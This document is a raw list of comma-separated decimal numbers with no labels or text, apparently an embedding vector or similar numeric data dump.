-0.01079280860722065, 0.009249972179532051, -0.04232584312558174, 0.012434273026883602, 0.02206467092037201, 0.013744627125561237, -0.01869720220565796, -0.020909303799271584, -0.020331621170043945, -0.000656497897580266, -0.007819854654371738, -0.009602217935025692, 0.007059003692120314, 0.0074112494476139545, 0.012856967747211456, -0.0006679458892904222, 0.017062781378626823, 0.009412004612386227, -0.02152925729751587, -0.013667132705450058, -0.018556304275989532, 0.0048645129427313805, 0.01424481626600027, 0.01757001504302025, 0.015372002497315407, -0.021571526303887367, -0.0061502098105847836, 0.0330265574157238, 0.01060964073985815, 0.01370940264314413, 0.007862123660743237, -0.011743871495127678, 0.006646876223385334, 0.016583727672696114, -0.0033392892219126225, 0.013829166069626808, 0.009404960088431835, -0.045763760805130005, -0.006005789153277874, 0.020063914358615875, 0.05114607512950897, 0.015639709308743477, 0.008482076227664948, -0.007073093671351671, -0.0006322810077108443, 0.011215503327548504, 0.0037091472186148167, -0.03519639000296593, -0.000008929979230742902, -0.014597062021493912, -0.0009378541726619005, -0.0021504599135369062, 0.004498177673667669, -0.008404582738876343, 0.00255025876685977, -0.0048645129427313805, -0.017386848106980324, -0.013843256048858166, -0.004233993124216795, -0.00021167764498386532, 0.007805764675140381, 0.026531146839261055, -0.005667633377015591, 0.005917727947235107, -0.013554414734244347, 0.019514411687850952, 0.011116874404251575, -0.005780351813882589, -0.013491010293364525, 0.03697170689702034, 0.0013482203939929605, 0.009369735606014729, 0.019894836470484734, -0.008594795130193233, 0.0188662800937891, 0.0016027179080992937, 0.0003240660298615694, -0.015752427279949188, -0.023797718808054924, 0.03925425931811333, -0.012229970656335354, 0.014019378460943699, 0.011398671194911003, 0.019429871812462807, -0.03683080896735191, 0.009123163297772408, 0.011610018089413643, 0.01634420081973076, -0.0063157654367387295, 0.011772051453590393, 0.007305576000362635, 0.006932195276021957, -0.04102957993745804, 0.005273118149489164, -0.002074727090075612, 0.01757001504302025, 0.002854951424524188, -0.014167321845889091, 0.0027034857776015997, 0.011215503327548504, -0.013667132705450058, 0.023149587213993073, -0.009172477759420872, -0.019908927381038666, 0.01938760280609131, -0.014167321845889091, -0.01896490901708603, -0.007425339426845312, -0.002515034284442663, -0.00900339987128973, -0.006368602160364389, 0.021022023633122444, 0.017245950177311897, -0.0017189589561894536, 0.010208080522716045, -0.00801006704568863, -0.00542106106877327, 0.01907762698829174, -0.0004381055769044906, 0.015301553532481194, -0.0031191357411444187, -0.013491010293364525, -0.006777207367122173, -0.002842622809112072, -0.0034537690225988626, -0.019641220569610596, -0.0012460692087188363, -0.012004533782601357, 0.032772939652204514, 0.005406971555203199, 0.0035312632098793983, 0.018556304275989532, 0.022106939926743507, -0.045171987265348434, 0.0023265827912837267, 0.026855211704969406, 0.021923772990703583, 0.003860612865537405, 0.004480565432459116, 0.015428361482918262, -0.010806897655129433, 0.001446849200874567, -0.008559570647776127, -0.0038782251067459583, -0.008559570647776127, 0.016231480985879898, -0.00308567238971591, 0.02013436332345009, -0.02275507152080536, -0.015104295685887337, 0.004519312176853418, -0.008806142024695873, 0.0020588762126863003, -0.003464336507022381, -0.005794441793113947, 0.012096117250621319, 0.0004050825664307922, 0.006432006601244211, -0.013716447167098522, 0.017499566078186035, 0.02713700942695141, -0.013385336846113205, -0.017781361937522888, 0.020049825310707092, -0.0011765005765482783, -0.025939373299479485, -0.022247837856411934, -0.012110207229852676, -0.014808408915996552, 0.015935596078634262, -0.001370235811918974, 0.006435528863221407, -0.018528124317526817, -0.012462452985346317, 0.008242549374699593, 0.005572527181357145, -0.026996109634637833, -0.03931061923503876, -0.031138518825173378, 0.008806142024695873, -0.00045483725261874497, -0.03626721724867821, -0.0012971448013558984, -0.004617941100150347, -0.009679711423814297, -0.00408605020493269, 0.014378669671714306, 0.008482076227664948, -0.01244836300611496, 0.055119406431913376, 0.029588637873530388, -0.01151843462139368, 0.010165810585021973, 0.030321309342980385, 0.014794318936765194, -0.009137253277003765, -0.006424961611628532, 0.026249349117279053, -0.02307913824915886, 0.016372380778193474, -0.00817914493381977, -0.005086428020149469, -0.024220414459705353, 0.00881318747997284, 0.011215503327548504, 0.007460563909262419, -0.014202546328306198, 0.012082027271389961, -0.02841918356716633, 0.01976802945137024, 0.012856967747211456, 0.009743115864694118, -0.0045122671872377396, -0.0007599701057188213, 0.008305953815579414, 0.01880992017686367, 0.008305953815579414, 0.006805386859923601, 0.02403724566102028, 0.002597812097519636, -0.01463933102786541, -0.04080414026975632, 0.024713559076189995, 0.03077218495309353, 0.02105020359158516, -0.0038958373479545116, -0.005745127331465483, -0.009158387780189514, 0.014568882063031197, -0.042833078652620316, 0.013991199433803558, -0.014526613056659698, 0.015696069225668907, 0.021980131044983864, -0.014977486804127693, 0.03189937025308609, -0.0032494666520506144, -0.01060964073985815, -0.010849167592823505, 0.015231103636324406, 0.01764046400785446, 0.002220909111201763, -0.020373892039060593, 0.016062403097748756, -0.011955219320952892, 0.017161410301923752, 0.0050758603028953075, 0.020472519099712372, -0.0038782251067459583, -0.014554792083799839, -0.0033533789683133364, 0.0009360929252579808, 0.017499566078186035, -0.012469497509300709, 0.0037338044494390488, 0.002240282716229558, -0.014935217797756195, -0.0062030465342104435, -0.00607976084575057, -0.01758410595357418, -0.009257016703486443, -0.025713935494422913, -0.03421010076999664, -0.0165555477142334, 0.042297665029764175, -0.017696823924779892, -0.02066977694630623, 0.022952329367399216, 0.017879990860819817, 0.01789408177137375, 0.00798893254250288, 0.006432006601244211, 0.00039825780550017953, -0.03356197103857994, -0.00055742880795151, 0.000022510701455757953, 0.007108318153768778, -0.02152925729751587, 0.0010602595284581184, 0.007175244856625795, -0.0026295140851289034, -0.023924527689814568, -0.0031931072007864714, -0.00846798624843359, 0.01098302099853754, -0.02164197526872158, -0.010109451599419117, 0.000007959927643241826, 0.01125072780996561, 0.0074112494476139545, -0.016921883448958397, -0.02009209431707859, 0.009264062158763409, 0.010701224207878113, 0.005586616694927216, -0.010567370802164078, -0.0036140407901257277, -0.011081649921834469, 0.007495788391679525, 0.010623730719089508, 0.0004654046206269413, 0.020655687898397446, -0.004875080659985542, 0.021937862038612366, -0.016597816720604897, -0.008573660627007484, -0.010778718627989292, 0.029025046154856682, 0.008129830472171307, 0.00006323910929495469, 0.008615929633378983, 0.011152098886668682, 0.023431383073329926, 0.011652288027107716, -0.008298908360302448, -0.0032371380366384983, -0.004829288460314274, -0.0025379301514476538, -0.003048686543479562, 0.001274248817935586, 0.006298153195530176, 0.004131841938942671, 0.009954463690519333, -0.006178389769047499, 0.029306842014193535, -0.011300042271614075, -0.013617818243801594, 0.019993465393781662, -0.018993088975548744, 0.0008704871870577335, -0.013934839516878128, 0.008263683877885342, -0.009158387780189514, -0.007006166968494654, 0.013026045635342598, 0.012046802788972855, -0.008066426031291485, -0.009581083431839943, -0.0021134743001312017, -0.003027551807463169, -0.02148698829114437, -0.007770540192723274, -0.004586238879710436, -0.007016734220087528, 0.013927794992923737, -0.00531538762152195, -0.004737704526633024, -0.011595928110182285, 0.0019796208944171667, 0.000026033158064819872, 0.0017004661494866014, 0.009214747697114944, 0.006164299789816141, -0.006629263982176781, 0.0046214633621275425, -0.03691535070538521, 0.0012346211588010192, 0.013202168978750706, -0.004336144775152206, 0.0029870434664189816, -0.024403581395745277, -0.015343822538852692, -0.020345712080597878, 0.0208952147513628, -0.01747138611972332, -0.004307964816689491, -0.017541835084557533, 0.0019355900585651398, 0.0003357341920491308, 0.012807653285562992, 0.00801006704568863, -0.003092717146500945, -0.02441767230629921, 0.0037056247238069773, 0.011398671194911003, -0.0022121029905974865, 0.013561459258198738, 0.0209374837577343, 0.013772807084023952, 0.000431941298302263, -0.007531012874096632, 0.014526613056659698, -0.005251983180642128, -0.0001595012581674382, -0.00543867377564311, 0.014681600965559483, 0.0013693551300093532, 0.008397537283599377, -0.0030557315330952406, 0.017598195001482964, 0.002425211714580655, 0.002971192356199026, 0.02319185622036457, 0.002222670242190361, 0.010391248390078545, 0.015245193615555763, -0.008186190389096737, 0.0022948808036744595, 0.008369358256459236, 0.006460186094045639, 0.010482831858098507, -0.024192234501242638, -0.014892947860062122, -0.0050758603028953075, -0.0069181052967906, -0.00042225452489219606, -0.026784762740135193, -0.0008414268959313631, -0.018175877630710602, 0.034914594143629074, -0.021303819492459297, -0.013166944496333599, 0.010102407075464725, 0.018781740218400955, -0.012624485418200493, 0.012666755355894566, -0.01333602238446474, -0.0009607501560822129, -0.0037302819546312094, -0.014125052839517593, 0.025178521871566772, -0.007728270720690489, -0.020613418892025948, -0.0029042658861726522, 0.007714180741459131, -0.011687512509524822, 0.007678956259042025, 0.013286707922816277, -0.013110584579408169, 0.016978243365883827, 0.0019109329441562295, 0.004015600774437189, -0.026841122657060623, 0.004639076068997383, -0.004494654946029186, 0.014709779992699623, -0.002043025102466345, -0.015428361482918262, 0.001389609300531447, -0.003027551807463169, 0.0030574926640838385, -0.012568126432597637, 0.016865523532032967, -0.004730659537017345, 0.012025668285787106, 0.02822192572057247, -0.0012328599113970995, 0.01381507609039545, 0.018344955518841743, 0.02565757744014263, -0.0007022898644208908, 0.008298908360302448, -0.021007932722568512, -0.017978619784116745, 0.008968175388872623, -0.0012513528345152736, 0.014153231866657734, -0.011067559942603111, -0.002169833518564701, -0.007925528101623058, 0.036943528801202774, -0.0030891948845237494, 0.012596306391060352, 0.02024708315730095, 0.02393861673772335, 0.010503966361284256, 0.00843980722129345, 0.001459177816286683, -0.006572904530912638, -0.025263061746954918, 0.010313753969967365, 0.0031596438493579626, 0.00617134477943182, 0.005230848677456379, 0.008601839654147625, -0.0020025167614221573, -0.009320421144366264, 0.007678956259042025, 0.029729537665843964, 0.004670777823776007, -0.014054602943360806, -0.020162543281912804, 0.017668643966317177, 0.021980131044983864, -0.006220659241080284, 0.015991954132914543, -0.0141602773219347, -0.001836961368098855, 0.015851056203246117, 0.0004614418721757829, -0.021895593032240868, -0.004860990680754185, -0.012969686649739742, -0.002145176287740469, -0.019725758582353592, 0.019838478416204453, -0.014780229888856411, -0.005030068568885326, -0.018359046429395676, -0.021501077339053154, 0.013004911132156849, -0.014420938678085804, -0.0015842249849811196, -0.0012980253668501973, 0.0028267716988921165, 0.017936350777745247, -0.009327465668320656, 0.010208080522716045, -0.020923394709825516, -0.024713559076189995, -0.014864768832921982, 0.009404960088431835, 0.009743115864694118, 0.0009440184803679585, 0.020965663716197014, -0.027390625327825546, -0.031335778534412384, 0.00048037507804110646, -0.019190344959497452, 0.015104295685887337, 0.003001133445650339, -0.03266021981835365, 0.018471764400601387, 0.0039028823375701904, 0.01517474465072155, -0.021036112681031227, -0.0009906910127028823, -0.011934083886444569, 0.026376157999038696, 0.004082527477294207, 0.009975598193705082, -0.01892263814806938, 0.0011060514952987432, 0.003642220515757799, 0.013829166069626808, 0.015541080385446548, 0.014258906245231628, -0.007700090762227774, -0.009334511123597622, -0.03313927352428436, 0.016372380778193474, -0.01234268955886364, -0.015231103636324406, 0.02554485760629177, 0.0015445974422618747, -0.019429871812462807, 0.018302686512470245, -0.005473898258060217, -0.000021932799427304417, 0.00982765480875969, -0.022966420277953148, -0.025840744376182556, 0.0033780361991375685, 0.0010356022976338863, 0.028813697397708893, 0.014357534237205982, -0.0031719724647700787, -0.010419427417218685, -0.003529501846060157, -0.006051580887287855, 0.006872313562780619, 0.002645365195348859, 0.00431500980630517, 0.024178145453333855, 0.013850300572812557, 0.011116874404251575, -0.00946131907403469, 0.008510256186127663, -0.024910815060138702, 0.004477042704820633, 0.002671783557161689, -0.012666755355894566, 0.0027563225012272596, -0.011384581215679646, 0.006569382268935442, -0.004209335893392563, -0.00982765480875969, -0.01509020570665598, 0.02484036609530449, 0.026855211704969406, -0.005012456327676773, -0.00634746765717864, -0.014033468440175056, -0.003680967492982745, -0.011779095977544785, -0.003177256090566516, 0.022135119885206223, 0.015935596078634262, 0.023234127089381218, 0.0038782251067459583, -0.0041142296977341175, -0.008129830472171307, -0.014047558419406414, 0.02692566066980362, 0.015555170364677906, -0.007608507294207811, -0.0010866780066862702, 0.014794318936765194, 0.014442073181271553, 0.002074727090075612, 0.010926662012934685, 0.0036598327569663525, 0.02516443282365799, -0.017541835084557533, 0.0009950940730050206, 0.01810542866587639, 0.011934083886444569, 0.003772551426663995, 0.0001667663163971156, -0.002303686924278736, 0.030546747148036957, 0.023614551872015, -0.000979243079200387, 0.0038711801171302795, 0.0006243555108085275, -0.0002994088572449982, -0.015076115727424622, -0.0025449751410633326, 0.0064460961148142815, 0.015400181524455547, 0.00045924034202471375, 0.042241305112838745, 0.014181411825120449, -0.0028250105679035187, 0.009306331165134907, 0.01191294938325882, -0.013181034475564957, 0.004015600774437189, -0.010158766061067581, 0.0017533029895275831, 0.0015542841283604503, 0.009898103773593903, 0.006601084489375353, 0.011574793606996536, -0.02516443282365799, -0.013385336846113205, 0.017879990860819817, -0.0158228762447834, 0.004029690753668547, -0.015696069225668907, 0.018288597464561462, 0.014878857880830765, 0.010370112955570221, -0.004610896110534668, -0.002247327473014593, -0.009771295823156834, 0.019218524917960167, -0.02719336748123169, 0.005072338040918112, 0.005466853268444538, -0.010193990543484688, -0.0018422449938952923, -0.006731415167450905, 0.00910907331854105, -0.0038782251067459583, -0.016259660944342613, 0.03156121447682381, 0.025418048724532127, -0.0063157654367387295, -0.01934533379971981, 0.013512144796550274, -0.00916543323546648, 0.0005094353691674769, -0.01215952169150114, 0.008397537283599377, 0.013244437985122204, -0.001011825748719275, 0.010489877313375473, -0.00028686010045930743, -0.003850045381113887, 0.006942762527614832, -0.021191101521253586, 0.011638198047876358, -0.005096995271742344, 0.03457643836736679, 0.007622596807777882, 0.023360934108495712, 0.010644865222275257, 0.005273118149489164, 0.0067138029262423515, 0.007742360234260559, -0.010658955201506615, -0.023177767172455788, 0.0073901149444282055, 0.004473520442843437, 0.01848585344851017, 0.03046220727264881, 0.0027439938858151436, -0.0019126941915601492, 0.0014424461405724287, 0.0012328599113970995, -0.01757001504302025, -0.023431383073329926, -0.031279418617486954, 0.01261039637029171, -0.004931439645588398, 0.00025053476565517485, -0.019063537940382957, 0.032350245863199234, -0.01378689706325531, -0.0018545736093074083, 0.015076115727424622, -0.0023019255604594946, -0.0003751416807062924, -0.02131791040301323, -0.0015445974422618747, -0.012596306391060352, -0.00008332812285516411, -0.001831677625887096, 0.014808408915996552, -0.021501077339053154, 0.0019091716967523098, -0.009066804312169552, 0.0015401942655444145, -0.01645691879093647, -0.02281143143773079, 0.02072613686323166, 0.015555170364677906, 0.02083885483443737, 0.010975975543260574, 0.013047181069850922, -0.03725350648164749, 0.0139771094545722, -0.001299786614254117, -0.015470631420612335, 0.008883636444807053, 0.007693046238273382, 0.014280040748417377, 0.02367091178894043, 0.007594417314976454, -0.01928897388279438, -0.004885647911578417, -0.008291863836348057, 0.03719714656472206, 0.006946285255253315, -0.006023401394486427, 0.01810542866587639, 0.018175877630710602, 0.015963774174451828, 0.006896970793604851, 0.007118885405361652, 0.009102028794586658, -0.006696190685033798, -0.005234370939433575, -0.021247461438179016, 0.0036316532641649246, 0.01607649400830269, 0.020599327981472015, 0.00012493714166339487, 0.010968931019306183, -0.00817914493381977, -0.030264951288700104, -0.03784527629613876, 0.0029870434664189816, 0.0065834722481667995, -0.0044347732327878475, 0.004917350132018328, -0.010299663990736008, -0.01630193181335926, 0.01764046400785446, -0.0035453529562801123, 0.003688012482598424, 0.013378291390836239, 0.0063721248880028725, 0.0030574926640838385, -0.031223058700561523, -0.0051885792054235935, -0.005917727947235107, 0.020754316821694374, -0.0010267961770296097, -0.009778340347111225, -0.010701224207878113, 0.005350612103939056, 0.013321932405233383, 0.006875835824757814, -0.038127075880765915, 0.007678956259042025, 0.006882880814373493, 0.017119141295552254, 0.014392759650945663, -0.0008132472285069525, -0.009764250367879868, 0.002913072006776929, 0.019683489575982094, 0.015541080385446548, -0.0047905417159199715, 0.029954973608255386, -0.022050580009818077, 0.022261928766965866, 0.014864768832921982, -0.016795074567198753, -0.010229215025901794, 0.02372726984322071, 0.0016467486275359988, 0.01370940264314413, 0.006041013635694981, -0.047370001673698425, -0.009686756879091263, 0.00490326015278697, -0.001543716760352254, -0.02169833518564701, -0.003945151809602976, 0.0010162288090214133, -0.020444341003894806, -0.01544245146214962, 0.013984153978526592, 0.012941506691277027, 0.011469120159745216, 0.01892263814806938, -0.009813564829528332, 0.007995977066457272, 0.014223681762814522, -0.00033375280327163637, -0.00022103417722973973, 0.002927161753177643, -0.0067138029262423515, -0.018147697672247887, 0.0038782251067459583, -0.0002952259383164346, -0.0074676088988780975, -0.024065425619482994, 0.024023156613111496, -0.01816178858280182, -0.030434029176831245, 0.012842877767980099, 0.019429871812462807, 0.020063914358615875, 0.013307842426002026, -0.013371246866881847, -0.007573282346129417, 0.007495788391679525, -0.003797208657488227, 0.02778514102101326, 0.020697956904768944, 0.0000937303775572218, 0.01955668069422245, 0.004910305142402649, 0.0013719969429075718, -0.026911571621894836, -0.00126192020252347, 0.012399048544466496, -0.02565757744014263, 0.0074676088988780975, 0.013871436007320881, 0.0031085682567209005, -0.003392126178368926, -0.00762964179739356, 0.021867413073778152, -0.016259660944342613, -0.007657821290194988, -0.013589639216661453, 0.015597439371049404, 0.006343944929540157, -0.00905975978821516, -0.013589639216661453, -0.010489877313375473, -0.002342433901503682, -0.010454651899635792, 0.014442073181271553, -0.024882636964321136, 0.003039880422875285, -0.02843327261507511, -0.004885647911578417, 0.013061270117759705, -0.0007700971327722073, 0.010581460781395435, -0.004772929009050131, -0.00982765480875969, 0.02202240191400051, 0.00017006862617563456, 0.004498177673667669, -0.009045669808983803, -0.004706002306193113, 0.0006098253652453423, -0.0138362105935812, 0.006037491373717785, 0.018499944359064102, 0.003969809040427208, 0.01253290195018053, 0.008080516010522842, -0.022952329367399216, 0.011032335460186005, -0.01613285206258297, 0.003080388531088829, 0.02298050932586193, 0.0021997743751853704, 0.004029690753668547, 0.007210469339042902, 0.008045291528105736, 0.004917350132018328, -0.0003989182587247342, -0.021388359367847443, 0.009249972179532051, 0.00798893254250288, 0.004653165582567453, -0.005163921974599361, 0.027376536279916763, 0.002937729237601161, 0.004469997715204954, -0.00022466671362053603, 0.0026735449209809303, -0.0036316532641649246, 0.007932573556900024, 0.011455030180513859, -0.021233370527625084, 0.009898103773593903, -0.006199524272233248, -0.006815954111516476, 0.0005913324421271682, 0.004801108967512846, -0.00820027943700552, -0.000022194230041350238, -0.006914583034813404, 0.0031208968721330166, 0.0005741604836657643, -0.0039028823375701904, 0.006044536363333464, 0.011215503327548504, 0.0010717075783759356, 0.015498810447752476, -0.022402826696634293, -0.002988804830238223, 0.014977486804127693, -0.006921628024429083, 0.012173611670732498, 0.0035576815716922283, 0.013019001111388206, 0.0002802554809022695, -0.002823249204084277, -0.008644109591841698, 0.01565379835665226, -0.0073901149444282055, -0.011595928110182285, -0.017668643966317177, -0.01806315965950489, -0.007425339426845312, 0.016921883448958397, -0.00836231280118227, 0.018260417506098747, 0.027531523257493973, -0.030067693442106247, 0.007594417314976454, 0.02206467092037201, -0.048750802874565125, 0.007326710503548384, -0.03516821190714836, -0.008045291528105736, 0.024769917130470276, -0.00734784547239542, -0.008432761766016483, -0.021064292639493942, -0.01317398902028799, -0.015569259412586689, 0.0004158700758125633, -0.0029095495119690895, -0.024164054542779922, -0.00991219375282526, 0.004927917383611202, 0.009531768970191479, -0.010024912655353546, -0.003464336507022381, -0.005209713708609343, -0.016921883448958397, 0.022416915744543076, -0.010687134228646755, 0.02307913824915886, 0.005727515090256929, -0.012666755355894566, 0.027291996404528618, -0.018049068748950958, 0.020387981086969376, 0.0007084541721269488, 0.017725003883242607, -0.0031807785853743553, 0.013293752446770668, 0.010954841040074825, -0.0008674050332047045, -0.009412004612386227, -0.009623352438211441, -0.005304820369929075, -0.01119436789304018, 0.023276396095752716, 0.014498433098196983, -0.000013697679605684243, -0.016583727672696114, 0.001549000502564013, 0.0010637820232659578, 0.020542969927191734, -0.010370112955570221, -0.0009942135075107217, 0.007235126569867134, 0.000794314022641629, -0.028334643691778183, 0.007242171559482813, 0.008221414871513844, -0.0006221539806574583, 0.01597786508500576, -0.02431904338300228, -0.024248594418168068, -0.01354736927896738, -0.0071717225946486, -0.008341178297996521, 0.005435151048004627, 0.010158766061067581, 0.0035576815716922283, 0.02591119334101677, 0.014681600965559483, 0.0046003288589417934, -0.01783772185444832, -0.014054602943360806, 0.009369735606014729, 0.003680967492982745, 0.001229337533004582, -0.011180278845131397, -0.024910815060138702, 0.014808408915996552, 0.005294252652674913, 0.012039758265018463, -0.023318665102124214, 0.03077218495309353, 0.006717325653880835, -0.014322309754788876, 0.012025668285787106, -0.029588637873530388, -0.007066048681735992, 0.0019408738007768989, -0.004265695344656706, 0.0024674811866134405, -0.012201790697872639, 0.008087561465799809, 0.017344579100608826, -0.015231103636324406, 0.01319512352347374, -0.010299663990736008, -0.006167822051793337, -0.000987168517895043, -0.0036386980209499598, -0.006999121978878975, -0.001445968635380268, 0.002356523647904396, -0.01913398690521717, 0.0065024555660784245, 0.0008634422556497157, 0.02981407567858696, -0.005216758698225021, 0.015893325209617615, -0.004322054795920849, -0.0022103418596088886, 0.010419427417218685, -0.022628264501690865, -0.006562337279319763, 0.015780607238411903, 0.016146942973136902, -0.001281293691135943, 0.013505100272595882, 0.016738716512918472, -0.015512900426983833, -0.005417538806796074, -0.0027263816446065903, 0.011292996816337109, 0.009468364529311657, -0.0038394781295210123, -0.0023019255604594946, -0.011694557033479214, 0.020810676738619804, 0.00527664041146636, 0.0009889297652989626, -0.012751294299960136, 0.010060137137770653, 0.016752805560827255, 0.016752805560827255, -0.013667132705450058, -0.012237015180289745, 0.004952574614435434, -0.00549151049926877, 0.008073471486568451, -0.012321554124355316, -0.004519312176853418, 0.002222670242190361, -0.005364702083170414, -0.001824632752686739, -0.0022755071986466646, 0.0015727770514786243, -0.019782118499279022, -0.003797208657488227, -0.005558437202125788, 0.01370235811918974, -0.03322381526231766, 0.011300042271614075, -0.0019162165699526668, 0.018344955518841743, 0.009757205843925476, -0.0065588150173425674, -0.001485596178099513, -0.01630193181335926, 0.015512900426983833, 0.03457643836736679, 0.003258272772654891, -0.0063721248880028725, 0.009996732696890831, -0.0046355533413589, -0.006343944929540157, -0.0036069960333406925, -0.0014908799203112721, 0.004639076068997383, 0.021726515144109726, 0.0003718393563758582, 0.009320421144366264, 0.01597786508500576, 0.010461697354912758, -0.0256434865295887, -0.021275639533996582, -0.010651909746229649, -0.0014609390636906028, 0.003110329620540142, 0.015076115727424622, -0.018077248707413673, 0.007319665513932705, 0.027700601145625114, 0.01153956912457943, -0.012976731173694134, 0.02013436332345009, -0.0031790174543857574, 0.004283307585865259, -0.02137426845729351, 0.005713425111025572, 0.01237086858600378, -0.007974842563271523, -0.020909303799271584, -0.017189590260386467, -0.01768273487687111, -0.004829288460314274, 0.014568882063031197, -0.015696069225668907, -0.016118763014674187, -0.014272995293140411, -0.0007643731660209596, -0.02506580390036106, 0.0034291117917746305, -0.023220036178827286, -0.006611651740968227, -0.015329732559621334, -0.012673799879848957, -0.0025925282388925552, 0.0042234258726239204, 0.01046874187886715, -0.016851434484124184, -0.00937678012996912, -0.010003778152167797, 0.009785385802388191, -0.0205711480230093, 0.022402826696634293, 0.005125174764543772, -0.019415782764554024, -0.010828033089637756, 0.01965530961751938, -0.020613418892025948, 0.014935217797756195, 0.016710536554455757, -0.02975771576166153, 0.01034193392843008, 0.018147697672247887, -0.0004077244084328413, 0.03415374457836151, -0.018711291253566742, -0.02120519056916237, -0.0012275762856006622, 0.0051322197541594505, -0.003885270096361637, -0.01079280860722065, 0.005495032761245966, -0.01795044168829918, 0.01833086647093296, 0.018260417506098747, -0.021289730444550514, 0.02319185622036457, -0.009778340347111225, 0.018204057589173317, 0.014357534237205982, 0.007083660922944546, 0.010954841040074825, 0.04497472941875458, 0.00754510285332799, 0.02175469510257244, 0.02152925729751587, -0.006629263982176781, 0.017513656988739967, -0.008947040885686874, -0.00041807160596363246, 0.0020764884538948536, -0.011863634921610355, -0.012765384279191494, 0.006002266891300678, 0.006051580887287855, 0.009729025885462761, 0.008228459395468235, -0.011342311277985573, 0.007111840881407261, 0.015780607238411903, 0.013653043657541275, -0.015907416120171547, 0.008925906382501125, 0.0016282557044178247, 0.013117630034685135, 0.0025185567792505026, -0.025051714852452278, -0.0044136387296020985, 0.0030627762898802757, 0.015386092476546764, 0.0104476073756814, -0.02164197526872158, 0.01880992017686367, -0.01408278290182352, -0.001113977050408721, -0.005843756254762411, 0.009087938815355301, -0.012293375097215176, -0.005519689992070198, -0.002842622809112072, -0.014110962860286236, -0.0028531900607049465, 0.009482454508543015, 0.0050547257997095585, 0.004984276834875345, 0.0073548899963498116, -0.011962263844907284, -0.0009378541726619005, -0.021656066179275513, -0.00036039139376953244, 0.01089848205447197, -0.013307842426002026, 0.0005301297642290592, 0.005963519681245089, -0.005685245618224144, 0.018767651170492172, -0.009545858018100262, 0.031166698783636093, -0.004818721208721399, -0.014568882063031197, -0.004505222663283348, 0.00131916010286659, -0.004219903610646725, -0.010961886495351791, -0.0005613915855064988, 0.04108593985438347, -0.030067693442106247, 0.011391625739634037, -0.009031579829752445, 0.016527367755770683, 0.015512900426983833, -0.03361833095550537, 0.008749783039093018, -0.012434273026883602, -0.0040367357432842255, -0.026897480711340904, -0.00745351891964674, 0.01025739498436451, 0.00972198136150837, -0.010172856040298939, -0.01009536162018776, 0.003860612865537405, -0.0016379425069317222, -0.02537577971816063, 0.004212858621031046, 0.015456541441380978, 0.007918483577668667, -0.002793308347463608, -0.008066426031291485, -0.010849167592823505, -0.007488743402063847, 0.024178145453333855, 0.02837691269814968, 0.007118885405361652, -0.008045291528105736, -0.0008585989126004279, 0.0037795964162796736, -0.008785007521510124, 0.011765005998313427, 0.019204435870051384, 0.010482831858098507, -0.01461115200072527, -0.009123163297772408, 0.009848789311945438, -0.012539946474134922, 0.013265573419630527, 0.026066182181239128, -0.012955596670508385, -0.02447403036057949, -0.001445968635380268, -0.013075360096991062, 0.022247837856411934, -0.011814320459961891, 0.011976353824138641, -0.022628264501690865, 0.02430495247244835, 0.016442829743027687, 0.011067559942603111, -0.008968175388872623, -0.005907160229980946, 0.004607373848557472, -0.002081772079691291, -0.005822621285915375, 0.010102407075464725, 0.01370940264314413, -0.016809165477752686, -0.009940373711287975, -0.037957996129989624, -0.0037443717010319233, -0.008968175388872623, -0.006724370177835226, -0.008017112500965595, 0.004022645764052868, -0.023487742990255356, -0.000611586612649262, -0.001472386997193098, 0.014878857880830765, 0.027601972222328186, -0.00517096696421504, -0.003624608274549246, -0.0283205546438694, 0.005061770789325237, 0.026756582781672478, 0.018838100135326385, -0.010764628648757935, 0.01838722638785839, 0.0005988177144899964, -0.013321932405233383, -0.006752550136297941, 0.01461115200072527, 0.009729025885462761, -0.005125174764543772, -0.0032318541780114174, 0.01445616316050291, -0.02195195108652115, -0.000595295219682157, -0.006055103614926338, 0.003931061830371618, -0.012314509600400925, 0.007020256947726011, 0.015188834629952908, -0.019035357981920242, 0.022910060361027718, 0.006794819608330727, 0.009510633535683155, -0.010757583193480968, -0.0006930434028618038, -0.012307465076446533, 0.003990943543612957, 0.020345712080597878, -0.010489877313375473, -0.016851434484124184, -0.01084212213754654, 0.010222170501947403, 0.002900743391364813, 0.0036774449981749058, -0.015329732559621334, 0.003751416690647602, -0.010687134228646755, -0.01785181276500225, -0.0028496677987277508, 0.003099762136116624, 0.004484087694436312, -0.00972198136150837, 0.004843378439545631, -0.009574037976562977, 0.0015340300742536783, -0.022318286821246147, -0.0034414404071867466, 0.0034044545609503984, 0.007932573556900024, -0.0007802242180332541, -0.007552147842943668, -0.019598951563239098, -0.0014177889097481966, -0.0141602773219347, 0.01164524257183075, 0.008482076227664948, -0.013934839516878128, 0.016809165477752686, 0.013899615034461021, 0.007974842563271523, -0.016696445643901825, -0.01961304061114788, 0.022036490961909294, -0.015047936700284481, 0.010067181661725044, -0.008587749674916267, 0.007967798039317131, -0.04429841786623001, -0.025023534893989563, -0.010496921837329865, 0.0069885547272861, 0.023896347731351852, -0.01354736927896738, -0.0001652252540225163, 0.01720367930829525, 0.03147667646408081, 0.025234881788492203, 0.002164549892768264, 0.02168424427509308, 0.004272740334272385, 0.005952952429652214, 0.0016467486275359988, 0.00504768081009388, -0.006861746311187744, 0.011919994838535786, 0.03381558880209923, 0.012659710831940174, 0.0005191221134737134, 0.01634420081973076, 0.0007692165672779083, 0.01810542866587639, 0.01469569094479084, 0.018739471212029457, 0.01116618886590004, 0.007995977066457272, 0.015231103636324406, 0.004825766198337078, 0.0016150465235114098, -0.017443206161260605, -0.0005992579972371459, -0.019472142681479454, 0.02784149907529354, -0.00891886092722416, 0.018175877630710602, 0.015146564692258835, -0.02495308592915535, 0.0053752693347632885, 0.007048436440527439, 0.00046628524432890117, -0.0073337554931640625, 0.019739849492907524, 0.013321932405233383, 0.00782689917832613, 0.020218903198838234, 0.016414649784564972, 0.0025432140100747347, 0.010539190843701363, 0.027827410027384758, 0.022994598373770714, 0.036351755261421204, -0.0014354012673720717, -0.006241793744266033, 0.020528879016637802, 0.006143164820969105, 0.023656820878386497, 0.02223374880850315, -0.01703460142016411, -0.0015595678705722094, -0.021289730444550514, -0.005952952429652214, 0.04193132743239403, -0.004565104376524687, 0.009926283732056618, -0.023530011996626854, -0.014794318936765194, 0.02281143143773079, -0.02533351071178913, 0.0143434451892972, -0.01370940264314413, -0.012434273026883602, 0.010165810585021973, -0.015879236161708832, 0.0011923516867682338, 0.01907762698829174, -0.02388225868344307, -0.00558309443295002, 0.0011386341648176312, -0.00510051753371954, -0.011257772333920002, -0.0027122918982058764, 0.009785385802388191, -0.02613663114607334, 0.02516443282365799, 